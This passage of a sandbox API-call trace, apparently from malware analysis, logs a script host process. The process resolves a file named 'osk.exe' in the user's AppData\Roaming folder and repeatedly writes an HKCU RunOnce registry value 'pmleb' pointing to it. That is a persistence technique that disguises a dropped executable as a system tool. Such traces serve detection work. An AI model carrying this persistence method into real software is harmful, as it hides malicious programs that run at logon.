varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.648] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.648] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0077.648] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.648] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xf [0077.648] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.649] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0077.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.649] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.649] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.649] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.649] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.649] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.650] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.650] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.650] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.650] RegCloseKey (hKey=0x280) returned 0x0 [0077.650] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.650] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.650] SetTimer (hWnd=0x20280, nIDEvent=0x200e, uElapse=0xa, lpTimerFunc=0x0) returned 0x200e [0077.650] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.662] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.662] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.662] KillTimer (hWnd=0x20280, uIDEvent=0x200e) returned 1 [0077.663] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.663] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.663] IUnknown:Release (This=0x787518) returned 0x1 [0077.663] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.663] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.663] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.664] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.664] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0077.664] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.664] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x10 [0077.664] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.665] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0077.665] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.665] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.665] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.665] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.665] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.665] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.665] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.665] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.666] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.666] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.666] RegCloseKey (hKey=0x280) returned 0x0 [0077.666] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.666] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.666] SetTimer (hWnd=0x20280, nIDEvent=0x200f, uElapse=0xa, lpTimerFunc=0x0) returned 0x200f [0077.666] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.678] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.678] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.678] KillTimer (hWnd=0x20280, uIDEvent=0x200f) returned 1 [0077.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.678] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.679] IUnknown:Release (This=0x787518) returned 0x1 [0077.679] GetTickCount () returned 0x1149a8b [0077.679] GetCurrentThreadId () returned 0x544 [0077.679] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.679] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.679] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.679] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.680] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0077.680] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.680] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x11 [0077.680] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.680] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0077.681] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.681] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.681] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.681] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.681] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.681] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.681] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.681] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.681] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.681] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.681] RegCloseKey (hKey=0x280) returned 0x0 [0077.682] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.682] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.682] SetTimer (hWnd=0x20280, nIDEvent=0x2010, uElapse=0xa, lpTimerFunc=0x0) returned 0x2010 [0077.682] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.693] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.693] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.694] KillTimer (hWnd=0x20280, uIDEvent=0x2010) returned 1 [0077.694] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.694] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.694] IUnknown:Release (This=0x787518) returned 0x1 [0077.694] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 